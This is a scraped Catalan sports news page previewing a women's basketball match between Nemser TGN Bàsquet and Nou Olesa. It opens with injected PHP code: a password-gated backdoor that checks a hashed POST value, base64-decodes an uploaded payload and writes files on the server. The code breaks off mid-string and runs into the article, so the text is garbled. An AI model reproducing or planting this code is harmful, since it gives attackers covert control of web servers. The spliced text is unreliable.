function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser rep el segon classificat de la lliga, l'Olesa - Tgn Bàsquet Club -

El Nemser rep el segon classificat de la lliga, l’Olesa

By
Updated: octubre 25, 2013

Un altre rival dur, un altre os. El Nemser TGN Bàsquet afronta demà un matx molt complicat contra un dels grans equips de la categoria, el Nou Olesa, que ocupa la segona posició en la classificació general amb un balanç de quatre victòries i només una derrota. L’equip del Baix Llobregat arriba al pavelló del Sagrat Cor (demà, 20h) després de perdre la imbatibilitat a casa contra el Sabadell (58-64), un vell conegut de l’equip lila, doncs el conjunt vallesà va derrotar per 20 punts de diferència el Nemser en la segona jornada. El Nou Olesa suposa doncs un altre rival de màxima dificultat pel Nemser, que haurà jugat contra els cinc primers classificats de la lliga en les primeres set jornades perquè el conjunt de Juan Carlos Arjona viatja la setmana que ve a la pista del Sant Nicolau, l’actual líder amb un balanç de cinc victòries i cap derrota.

Arjona no podrà comptar encara amb Laura Martínez, que evoluciona de la seva fractura al cúbit al braç esquerre i d’Anais Muñoz, encara baixa per una hèrnia d’hiat. El matx, de màxima exigència, posarà a prova la combativitat de les tarragonines que han demostrat ser la tercera millor defensa del campionat per darrere, precisament, de l’Olesa. La defensa serà, una altra vegada, la principal arma de les locals per tombar un adversari de màxim nivell.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *